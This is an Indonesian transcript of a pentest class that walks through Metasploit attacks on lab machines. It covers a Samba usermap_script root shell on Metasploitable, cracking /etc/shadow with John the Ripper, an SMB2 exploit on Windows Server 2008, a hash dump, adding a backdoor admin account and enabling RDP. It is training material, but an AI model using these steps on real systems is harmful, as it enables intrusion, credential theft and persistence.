kita eksploitasi. Saya mau cari ini ya contoh, nanti bisa. Mohon maaf saya inikan dulu ya, saya sharing screen-nya saya off-kan dulu, saya sambil nyari sebentar ya. Jadi saya bisa kasih contoh. Nah, ini saya kasih contoh mungkin yang di di Linux dulu ya. Ini kan kemarin kita ada dua saya close dulu ini. Ini saya setel Linux ya versi yang ini. Ya, jadi saya masih menggunakan yang kemarin itu di Meta 1, Meta 2 ya. Oke, saya tunjukkan dulu demo di ini.
dengan menggunakan jadi kita pakai Kali Linux yang versi apa aja boleh ya. Nah, kemudian kita jalankan Meta 1 ya. Kelihatannya Pak ininya, Kali Linux saya ya, yang VM. Ya, Yes, ya, Pak. Pak. Oke. Nah ini kita ambil aja, saya kasih contoh aja salah satu exploit yang ada di Linux, tapi sebenarnya banyak yang bisa kita eksploitasi sih sebenarnya. Ya. Nah ini kalau kemudian kita jalankan, seingat saya itu saya udah pernah jalankan, tapi kita ambil aja salah satu ya. Misalnya kita nmap dulu ya, nmap kan config ya, nmap. Ya, kita cari dulu IP address-nya kan. Kita bisa scan ulang dari dengan menggunakan nmap ya. Kita bisa scan ulang, kita dapat misalnya 129 ini. Kita bisa nmap ulang ya. Kalau nggak salah saya kalau kita pakai nbt start ya. Ini nbt start, nbt scan ya. 92168. Nah, ini Metasploitable 1 kita coba yang ini ya. Yang 130 deh ya. Terserah sih, yang mana aja boleh sih sebenarnya. Nah, pertama kita kan harus cari services-nya dulu nih ya. Berarti kan kita harus scan ya. Kita scan, memang scan-nya agak lama lagi nih ya. Tapi ya saya bypass saja. Nmap -n -s minus SV ya, SSU kita juga scan UDP portnya, SV O ya, kita bisa gabung atau kita pakai -a aja juga boleh sih ya, kita -a aja ya. Nah ini sambil kita sorry, ini kayaknya mesti harus pakai sudo. Nah, ini sambil kita scan. Nah, sebenarnya ada kerentanan yang ada di Linux ini. Salah satunya adalah kalau kita lihat itu ada namanya user map script, seingat saya ya. Jadi Linux ini banyak yang rentan tuh di SMB-nya. Ya. Jadi kalau kita lihat, kalau kita scan seperti secara normal aja, biar cepat ya. Ini kita bisa scan nmap -n ya, kita pakai fast scanning aja ya. Nah ini bisa kita dapatkan Samba itu adalah SMB ya. Nah, kalau kita lihat ini ada SMB net bias nih 139445 ini juga MS. Ini SMB ya. Nah ini bisa kita kita bisa eksploitasi ya. Nah, kita coba eksploitasi yang ada di 130 misalnya. Ya.
Ini untuk mempersingkat karena sebenarnya saya harus scanning kerentanan ya. Saya coba scan ulang deh pakai ini ya. Sambil saya jalankan sambil saya ini. Nmap -n -script val 192.168 116 114 ya. Sorry ya, ada kekurangan. Ya, ini kita scan aja. Nah, sambil kita buka Metasploit ya. Ini sini bisa kita cari kerentanan. Harusnya sih dari laporan kerentanan ya. Misalnya kita bisa ya harus kita scan dulu, cari kerentanannya, baru kita exploit. Tapi karena ini kan lama nih prosesnya, jadi saya bypass saja, saya masuk ke eksploitasi aja. Asumsinya saya udah tahu. Misalnya gini nih, search Samba. Nah ini kita bisa ambil yang salah satunya ini nih, yang user map script ini. Nah, ini adalah salah satu yang mungkin ini kan karena rankingnya ini excellent nih, bisa jadi ya ini tahun 2017 ya 2007. Kalau kita ketik info, ini adalah modul username map script command. Ini platformnya Unix. Yeah, this module exploit a command execution vulnerabilities in Samba version 3 through 3 point something when using the non-default user and map script ya. Nah ini. Nah kalau kita mau lihat apakah si target kita itu menggunakan versi Samba versi 3 sampai ini, kita bisa jalankan command lagi ya. Saya bisa jalan search ini saya jalankan use apa ya namanya? Search Samba, SMB juga boleh ya, SMB. Ini ada command, ada tool yang untuk digunakan untuk melihat versi ininya Sambanya, versi SMB-nya. Kita coba lihat ya, namanya SMB version kalau nggak salah saya itu. Nah ini, use aja auxiliary scanner SMB version. Nah ini kita bisa show option, set our host. Nah kita setel aja 192, 168, 116.0/24. Mungkin kita run aja. Ya, kalau memang targetnya kita udah ketemukan, kita bisa ini ya, kita cancel dulu ya. Saya set our host-nya langsung aja satu host. Saya 116, 130. Nah, ini Sambanya 30220 Debian. Nah, ini bisa jadi target nih ya. Nah, oke. Target kita adalah 130. Nah, kemudian saya ketik back ya, kemudian search clear. Search Samba. Nah, kita pakai yang ini. Ini nyoba-nyoba ya, kita asumsinya kita udah tahu kerentanannya dengan dari hasil scanner kerentanan yang ini nih. Dari hasil ini nih. Ya. Ya, saya tinggal copy. Ya, tadi kan udah info ya, dapat. Nah, kemudian kita use saja. Use. Kemudian kita set payload. Ini udah otomatis ya dibilang no payload configured defaulting to CMD Unix reverse netcat. Ya, oke. Kalau mau yang lain juga boleh ya, nggak masalah. Kemudian kita bisa show payload aja. Payloadnya banyak sekali nih. Kayaknya kalau netcat ini ya. Ini via netcat. Ya udah, ini bind reverse netcat. Berarti kalau kita connect kita harus netcat dulu ya. Atau kalau mau yang simple Unix reverse aja. Ya udah nggak apa-apa, ini biarkan aja ya. Jadi kita jalankan aja ya.
show payload, show options. Kita tinggal setel our host 192, 168, 116, 130. Nah, portnya ya kalau kita mau nge-bypass firewall supaya nggak ketahuan ya kita bisa set L port 443 memanfaatkan port yang memang udah kebuka dari host atau target. L host kita setel karena reverse set L host 132 nggak salah ya kemarin. 132 ini adalah kita punya IP-nya kali ya. Nah, kemudian kita exploit. Sebentar, ini kenapa nih? Oh, ini bisa jadi karena saya tidak menjalankan MSF console-nya dengan root permission. Saya exit dulu. Sudo MSF console. Sambil jalan, yang ini kita bisa dapat informasi ini dari tadi yang di hasil scanning-nya kita. Ya, ini 129, coba kita lihat yang 130. Ini kerentanannya nggak terlalu banyak kalau di hasil scan ya. Ini ada beberapa seperti SSL Poodle ya. Di port tadi 445 ini malah nggak ada ini ya. Ya inilah kalau problemnya kalau kita pakai scanner, vulnerability scanner yang masih open source ya, jadi nggak lengkap ya. Nggak apa-apa, ini kita ini kan aja. Saya balik ke ini tadi. Search Samba. Kita pakai lagi. Ini. Use. Show options. Set our host. Karena target kita cuma satu ya, langsung aja set L host. Karena ini kan reverse. Reverse connection itu artinya gini, kalau kita udah berhasil mengeksploitasi, kita akan mengirimkan payload yang nanti payload itu dieksekusi di target. Nah, target akan memanggil kita untuk connect balik. Nah, ini namanya reverse. Kalau bind itu kita cuma connect ke mereka ya, kalau ke target ya. L host harus target kita punya kali ya, IP-nya kali 32. Set L port ini bebas ya, L port ini opsional, bisa kita ubah kalau mau nge-bypass firewall, misalnya saya ketik 443 atau ya pakai yang ada aja lah, nggak apa-apa ya, biar nggak bingung ya. Show options udah lengkap kan. Nah, kemudian coba kita ketik exploit. Nah, ini dapat nih dah command session open ya. Nah, untuk di Linux yang keluar ini command session aja, dia nggak nongol kayak C.2 Windows System 32, itu nggak kayak gitu, beda. Nah, kalau udah seperti ini Anda bisa coba jalanin, ketik aja ID. Wah, ini kita udah dapat root nih. Atau kita ketik aja misalnya uname -a. Ya. Kita dapat nih metasploitable. Nah, kemudian kita bahkan bisa melihat informasi yang cuma bisa diakses. Ini kan kita udah root ya. Kita bisa mengakses informasi yang cuma bisa diakses sama root. Contohnya adalah cat/etc passwd. Nah, ini kita bisa dapat, atau cat/etc shadow. Nah, begitu. Nah, ini adalah contoh sederhana bagaimana kita bisa kita sebenarnya kalau udah masuk sebagai root ini. Nah, terus kalau kita nggak tahu root gimana? Ya, ini kita bisa copy nih. Kita bisa copy dari cat etc passwd
Ya, kita bisa copy sampai yang cat etc yang tadi itu shadow. Ini kita bisa gabung pakai unshadow namanya. Ya. Ini misalnya contoh saya copy ya. Saya masukkan dalam file namanya kita ketik aja nano misalnya namanya apa ya? Users.txt atau passwd aja ya, passwd.txt. Kita simpan, kita save, kemudian nano lagi shadow.txt. Dan kita copy yang tadi shadow-nya. Nah, ini. nanti baru kita crack ya. Ya, kita simpan. Nah, ini bisa setelah kita simpan ini kita bisa ketik ini unshadow. Unshadow ini password file passwd sama shadow file shadow.txt. Kemudian kita simpan dalam namanya unshadow.txt. Nah, cat unshadow dia akan keluar seperti ini. Nah, baru kemudian kita kan ada tadi ada passwd, cat ya. Jadi kita ada ls unshadow. Ini adalah gabungan dari yang itu tadi username sama password yang ada di Linux ya. Ini kalau kita cat unshadow hasilnya kayak gini. Nah, kemudian baru kita pakai John the Ripper, John. Ini kita tinggal masukin aja John nama filenya. John unshadow. Nah, ini dia lagi nih, ini udah dapat nih. Ada namanya Batman. Ya. Jadi contoh sederhana dari kalau kita pakai unshadow ya. Dia masih melakukan crackingnya, ya biarkan aja ya. Nanti kita bisa lihat hasilnya. Tapi kita udah dapat saat ini 2 password. 123456789 sama Batman ya. Ini biarkan aja kita jalan ya. Nah, kemudian kita kembali di sini. Tadi kan kita udah ada akses nih. Kalau kita nggak mau nge-crack, Bapak Ibu masih dengar ya? Soalnya nggak ada suara sama sekali nih. Halo? Ya, Pak. Masih dengar ya? Oke. Ya, Pak. Masih lihatin ya demonya saya. Nah, jadi ada 2 cara kita dapat passwd sama shadow, kita unshadow, kemudian kita crack, atau mau yang ekstrim, ya bisa aja. Ekstrimnya gampang sekali. Kita cuma butuh misalnya contoh, gimana kalau saya ganti aja passwordnya si target? Bisa aja sih, cuma kalau dalam pentas itu tidak etis lah ya. Ya, kalau mau ganti gimana? Ya gampang, Pak. Tinggal ketik aja passwd, passwd. Nah, udah new Unix password dia. Ini tinggal kita ganti mau passwordnya apa, ya kan? Misalnya nih saya ganti nih, misalnya huruf besar P gitu ya. Ini kan contoh aja ya. Nah, ini. Saya udah ganti kan? Udah ganti ya, tinggal SSH aja. Kan saya udah tahu targetnya. Ini udah diganti dengan pas tadi. Ya, tinggal ketik aja SSH root at 130. Nah, yes. Ya, tinggal masukin aja username sama passwordnya kan gitu. Ya. Ini belum tentu juga bisa kita connect ya, karena kadang-kadang SSH-nya juga, ini ada password, udah tinggal ganti aja. Masuk udah kita ls uname. Selesai ya. Nah, ini adalah cara yang agak sedikit ekstrim karena kita menggunakan cara kasar ya, kita ngubah password dari target. Tapi sebenarnya kalau di pentas sih sebenarnya tidak etis ya, kita nggak boleh ngerubah sebenarnya. Ya, oke, itu Pak ya. Nah, itu sambil
Ini cara sederhana ya. Ini juga masih jalan ya. Ya, kita bisa nge-crack juga ya. Jadi ini adalah contoh sederhana bagaimana kita bisa melakukan eksploitasi terhadap target kita di Linux kayak gitu ya. Oke. Nah, kalau untuk Windows agak sedikit beda. Untuk Windows itu agak sedikit beda. Coba sebentar saya coba ini kan ya. Kalau untuk Windows beda, saya close dulu. Nah, ini karena untuk yang hal ini quit aja ya. Nah, untuk Windows saya coba menggunakan target yang lain ya. Ini tadi ada saya copy target. Misalnya LON ya, di sini ada. Saya move dulu sebentar. Ya, sebentar ya. Saya coba copy ini dulu. Ini saya akan coba pakai server yang agak sedikit inilah. Bentar saya coba ya. Saya udah agak lama nggak pernah akses ini soalnya. Nah, ini saya upgrade dulu VM-nya karena ini VM lama ya. Oke. Nah, kemudian saya coba ini saya biarkan aja ya. Saya kasih memori agak gede supaya bisa ini. Kemudian adapternya saya setel NAT aja ya. Wah, host only. Nah, ini Windows Server ya. Saya agak lupa ini. Server versi berapa pun udah lupa, udah lama. Kadang-kadang dulu tuh rajin tuh ngumpulin. Nah, ini Windows Server 2008. Kalau nggak salah saya di IP-nya pakai IP address yang 192. Jadi saya coba ganti ini aja ya. Jadi ya, ini saya ketik aja sudo config eth0 saya ganti jadi 192. Nah, ini. Nah, ini saya coba nmap. -n-sn. Seingat saya sih 192 dia. Oh, ini kayaknya beda ini. Sebentar. Saya coba setel dulu ya. Coba saya lihat IP-nya. Nah, ini
bisa dari sini ya, berarti ada koneksi ya. Ini kan target kita ya. Nah, kalau kita coba scan lagi, harusnya sih ini ya, dapat ya. Kalau nggak dapat ya nggak apa-apa, kita coba pakai. Ya, harusnya sih connect. Oh, kayaknya nggak connect ya, kenapa ya? Tapi dari sini, mungkin ada gara-gara firewall kan ini, bisa jadi sih. Coba saya pakai NetDiscover aja. Coba saya lihat, ada nggak koneksinya. Karena dari target kita bisa connect. Oh, dapat ini, ada. Ini nggak dapat 1205. Ini kayaknya, ya coba saya scan aja. Jadi kalau kita nggak dapat pakai ini, kita bisa pakai NetDiscover ya, toolnya. Bisa pakai NetDiscover atau kita pakai NBT scan aja. NBT scan. Nah, ini bisa dapat ini kalau memang nggak dapat ya kita coba pakai NetDiscover. Nah, ini dapat nih. Launch SVR. Nah, ini. Ya, karena kita udah dapat 205, kita coba. Nah, kita coba ini nih, ekspektasi. Nah, sambil kita cari-cari kerentanan apa yang mungkin kita bisa ekspektasi. Misalnya SMB juga misalnya, search SMB, search SMB. Nah, ini. Kita lihat nih kira-kira yang masuk akal ya. Ini kan memang harus kita scan sih sebenarnya ya. Kalau memang kita nggak scan, kita biasanya harus coba-coba ya. Misalnya kita ambil apa ya, Samba. Saya dulu pernah nyoba ya, kalau nggak salah saya Net API juga. Ya, kita coba misalnya dengan menggunakan pertama kita search dulu nih ininya. SMB search SMB version. Nah, ini kita coba use auxiliary scanner SMB version. Set our host. Kita coba run. Lihat. Nah, ini kelihatan nih dia pakai Windows 2008 Enterprise SP2 namanya ini ya. Nah, terus gimana kita ininya? Karena kita udah tahu dia pakai ini pakai 2018 Enterprise ya. Kita coba cari yang misalnya ini nih. MS030 ini nih, exploit ini kita coba ini. Ya. Show options, set our host. Nah, kemudian kita coba exploit aja. Ini kayaknya dibilang fingerprint language unknown. Nah, kita show target dulu. Nah, ini ada nih 2008. 2008 kayaknya nggak masuk deh. Ya, ini kayaknya nggak bisa. Kita cari lagi. Search misalnya search SMB. Kebanyakan sih XMB ya yang bisa dieksploitasi di Windows dan Linux itu. Karena kan SMB itu kan adalah salah satu service yang paling sering digunakan. Nah, kita coba lihat exploit apa nih kira-kira yang bisa di 2008. Dulu tuh saya pernah lihat dapat tuh ada, misalnya saya lihat dulu ya, exploit SMB. Ini ada SMB generic DLL injection. Ya, kita harus cari yang di atas 2008 ya. iPass, Kill Bill. Seingat saya ini nih ada SMB 2. Ini kan dia pakai versinya versi SMB. Kalau yang ini nih
Versi SMB-nya SMB versi 2 ini seingat saya. Nah, ini. Ada dibilang SMB ya. Oh, kita coba ini jadi ya. SMB 2 ya. Coba kita ini kan dulu. Saya copy. Soalnya ada ini dia ya. Use SMB version, SMB search SMB itu. Ya ada SMB 2 seingat saya. Search SMB version. Nah, ini ada SMB, SMB 2. Coba kita lihat. Auxiliary. Coba search SMB tadi versionnya. Nah, ini kalau SMB 2 karena seingat saya Windows 2008 itu dia udah pakai SMB 2. Coba auxiliary scanner aja kita coba. Use ini set our host run. Nah, ini SMB-nya versi 2. Berarti kita bisa cari nih pakai ini. Misalnya negotiate corrupt misalnya. Atau pakai ini malah. Ya, kita coba. Back. Clean. Use ini. Show options. Set our host. Kemudian karena dia reverse TCP, ini kan udah dibilang ada reverse TCP, ya kita mesti setel lhost, set lhost, yaitu IP-nya kita. IP-nya kali, kemudian kita exploit. Nah, kita bisa lihat nih, jebol nggak nih? Nah, jebol nih, ya. Kita dapat meter-meter, kita sysinfo, ya, LAN SVR1, kita bisa lihat hashdam atau run host. Apa ya komennya? Ya udah hashdam aja coba. Nah, ini udah dapat nih. Ya. Kemudian kalau mau lihat cpromnya, ya ketika dia shell, tuh keluar kan? QMI anti-authority. Nah, kalau mau bikin user ya bisa, tinggal kita ketik aja net user, misalnya pentest, kemudian passwordnya /add. Nah, kemudian net local. Kita add user kan baru. Kemudian kita juga bisa nambahkan user ini menjadi member of admin, local admin, net local group, administrators, pentest /add. Nah, udah kita dapat ini, baru kemudian kita coba remote connection, ya, coba RDP, or desktop. Nah, kita bisa lihat nih apakah bisa kita remote control atau enggak nih. Nah, kadang-kadang dia RDP-nya kalau nggak on ya nggak mau dia. Ya. Nggak apa-apa sih. Nanti kita bisa jalankan ada tool lagi. Ya ini kan nggak bisa nih sementara. Ya kita biarkan aja. Kita exit dulu. Kita ketik aja net user. Nah ini kan udah dapat nih administrator. Ya, ini member of ini. Kita sudah masuk dalam ini. Net group. Nah, ini nggak ada, ya udah exit. Nah kemudian kita bisa jalankan, seingat saya itu ada script namanya run get GUI -e.
Nah, ini masih bisa jalan post Windows Manage Enable RDP ini dibilang. Tapi ya masih bisa dipakai sih sebenarnya. Kalau ini bisa jalankan juga. Nah, kita coba connect lagi. Nah, yes, trust certificate, yes. Kayaknya sih bisa connect ini. Karena udah ada keluar. Tadi kan nggak keluar sama sekali. Nah, ini ada koneksi nih. Langsung dapat kita. Login lah sebagai pentest, kemudian password yang kita setel sendiri. Bingo, saya udah dapat full akses ke Windows Server 2008 Enterprise. Mantap kan? Nah, gimana Pak? Sudah dapat ininya? Sudah dapat idenya? Halo, yang lain? Siap, sudah Pak. Oh, nggak ada suaranya nih ya? Kayak sunyi senyap ini. Yang ngomong saya sendiri. Siap, Pak. Pak, cuma nyobanya nggak bisa, Pak. Nyobanya ngeheng komputernya. Oh, nggak apa-apa, Pak. Ini saya demo aja dulu. Nanti ada waktu bisa kutak-kutik sendiri. Nah, ini saya cuma demoin bagaimana kita bisa melakukan eksploitasi terhadap Windows maupun terhadap Linux. Jadi, udah dapat gambaran, kalau pakai Windows ini seperti ini ya. Yang pasti kita sebagai pentester harus ngerti komen-komennya di Windows dan beberapa yang lain gitu. Ya, oke. Sebentar. Oke, Pak. Sip, Pak. Ya, kita break sebentar. Urutan ya. langkahnya bisa dicatat, Pak. Lupa, Pak. Kenapa? Urutan langkahnya bisa Itu dicatatkan, nanti Pak. saya kirim lupa. Bapak ini video yang lengkap step by step ya. Saya kirimin ke ininya YouTube videonya, linknya, nanti Bapak bisa lihat. Nah, ini saya rencana nanti setelah kelas kita selesai, saya coba bikinin video, saya upload ke YouTube biar ini video terbaru nantinya. Tapi video-video sebelumnya udah ada membahas tentang ini juga sih, ya. Oke, kita break sebentar, nanti sambil saya benahin yang lain dulu ya. Sekitar 15-20 menitan ya. Oke, kita break istirahat dulu sebentar sambil saya kotak-kotik ini dulu ya. Ya, Oke. Halo Bapak Ibu. Halo. Ya, Pak. Ya, Pak. Masih di sana kan ya? Saya masih, Pak. Oke, ya. Ini ada exercise yang nantinya Anda coba ini ya. Nanti di snapshot, nanti coba maksudnya di screenshot, kemudian dijalankan. Kita ada sekitar 60-90 menit ya. Jadi ini targetnya sekitar 90 menit untuk menjalankan eksploitasi ini. Tapi karena target Anda nggak ada Windows, jadi agak susah nih. Saya cuma kasih exercise untuk exploiting Linux-based vulnerabilities ya. Ini ininya. Ya, udah saya Kenapa tuh suaranya? Ya, ini bentar ya. Pak, kebetulan saya ada Windows, Pak. Ya, silakan coba. Cuma Windows-nya versi berapa? Windows 7 kayaknya. Ya, Windows 7. Ya, cobain aja. Saya nggak ada kasih ini ya, cari-cari aja vulnerabilities yang bisa dieksploitasi. Oh. Ya. Yang penting bisa masuk ke Windows-nya itu, Pak ya? Ya, yang penting bisa jebol Windows-nya. Anda bisa cari-cari di internet, di exploit DB. Ya, ini saya udah tulis nih. Ya, oke. Ini tolong salah satu screenshot kemudian kirim di WA group. Nanti biar yang lain bisa. Nah, untuk sementara yang belum nggak ada Windows, Anda bisa jalanin ini ya, exercise ini. Exploiting Linux-based vulnerabilities lab exercises, expected duration 90 menit, target hostnya sama, Metasploitable 1 dan 2. Search for any possible vulnerabilities on Metasploit framework. Sorry. Jangan snapshot dulu ya. Kayaknya ini ada salah nih ketiknya. Dihapus dulu, Pak.
Search any possible vulnerabilities. Search for any possible vulnerabilities on Linux. Tapi nggak apa-apa, ini udah ini nggak apa-apa sih, udah ini. Search for any possible vulnerabilities, Linux vulnerabilities. Ini search any possible exploits. Sorry. Harusnya possible exploits. Ya, oke. Ini yang tadi ada salah sedikit ya. Ini boleh di screenshot lagi, Pak. Silakan. Yang tadi dihapus saja. Oke. Search for any possible exploits on Metasploit framework. Use searchsploit to search and exploit db.com public exploits website. Kemudian exploit the following Linux-based vulnerabilities on your target host by utilizing Metasploit framework. Saya udah kasih clues-nya ini. Samba user map script, Tomcat manager, deploy, UDAV netlink, sama TikiWiki grab formula. Ini Anda bisa search di internet ya, silakan. Ada pertanyaan kira-kira? Ini udah saya kasih clues-nya ya. Jadi Anda tinggal cari informasinya di pakai Metasploit ya, kemudian cari informasinya di website, browsing aja, cari cara penggunaannya, coba-coba ya. Nanti bisa ini nggak susah kok. Ini udah ada exploit-nya, udah nggak harus cari lagi, udah saya jelasin. Satu tadi udah saya kasih contoh di demo saya. Nah, sisanya Anda coba sendiri ya. Ada pertanyaan Bapak Ibu? Belum ya? Oke. Ya udah silakan dulu. Ini ya, ini silakan aja. Anda punya waktu sekitar ya 1,5 jam untuk nyoba ini ya. Nanti saya sambil nanti kita bahas, kalau ada waktu kita bahas. Ya, kalau enggak ya besok kita lanjutin dulu ya. Oke, tadi kan udah udah dikirim ya ininya step by step-nya, maksudnya untuk exercise-nya, silakan Anda coba dulu ya. Saya di sini standby, kasih kabar aja.
Halo Bapak Ibu. Ya Pak. Ya, kira-kira ada kesulitan nggak? Ya sambil dieksplorasi aja ya. Ini memang butuh waktu buat eksplorasi. Ya, ini nanti saya setelah kelas saya coba bikinin video buat ini ya, buat yang tadi barusan saya demo. Mudah-mudahan bisa bantu ya. Makasih, Pak. Ya, biar nanti setelah saya upload saya kasih linknya aja di WhatsApp grup. Ya, jadi bisa nge-review juga. Oke. Oke, Pak. Makasih, Pak. Nah, jadi untuk saya pikir karena materinya udah di slide juga ada selesai ya. Sementara dilanjutkan dulu ya untuk praktikumnya, untuk exercises atau lab exercises-nya untuk Linux dan Windows ya. Tapi labnya kan tentang Linux saja. Dicobain ya. Nanti tolong bikin dokumentasi berupa simple report aja. Ya, kalau ada kesulitan bisa WA ke saya seperti biasa ya. Kalau itu ya cobain ininya, jadi harus rajin latihan soalnya banyak ujian tuh nanti pertanyaannya pakai yang berhubungan dengan Metasploit, pertanyaannya berhubungan dengan Windows exploit, vulnerabilities yang ada di Windows dan di Linux ya. Dicobain semua ya. Oke. Ya, sementara itu dulu hari ini. Assalamualaikum warahmatullahi wabarakatuh. Kita jumpa lagi besok jam 8 seperti biasa. Waalaikumsalam warahmatullahi wabarakatuh. Jadi cobain ya, baiknya ya, jangan enggak ya. Iya, Pak. Terima kasih, Pak. Terima kasih, Pak Semi. Ya, kasih.